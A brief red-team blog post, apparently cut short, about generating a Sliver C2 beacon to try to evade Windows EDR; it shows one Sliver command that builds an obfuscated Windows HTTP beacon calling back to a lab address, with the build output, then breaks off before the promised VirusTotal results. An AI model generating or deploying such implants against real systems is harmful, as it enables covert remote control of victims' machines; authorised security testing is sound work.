Breaking into Windows: Attempting to bypass EDR with Sliver

less than 1 minute read

Background

Sliver C2 is a pretty awesome alternative to metasploit developed by Bishop Fox:

Sliver is an open source cross-platform adversary emulation/red team framework, it can be used by organizations of all sizes to perform security testing. Sliver’s implants support C2 over Mutual TLS (mTLS), WireGuard, HTTP(S), and DNS and are dynamically compiled with per-binary asymmetric encryption keys.

You can create both a beacon and an implant. Im going to be using a beacon as it is alot stelthier:

$ sliver > generate beacon --http 192.168.56.1 --os windows --arch amd64 --format exe

[*] Generating new windows/amd64 beacon implant binary (1m0s)
[*] Symbol obfuscation is enabled
[*] Build completed in 16s
[*] Implant saved to /home/cleck/MODERN_MIDWIFE.exe

If we throw this into virus total we get:

Share on

Twitter Facebook LinkedIn

CLECK

Breaking into Windows: Attempting to bypass EDR with Sliver

Background

Share on

You may also enjoy

UART Basics: Getting a shell via UART (Netgear WNR1000v3)

EvilPI: Using a Raspberry Pi as an Agent into an Internal Network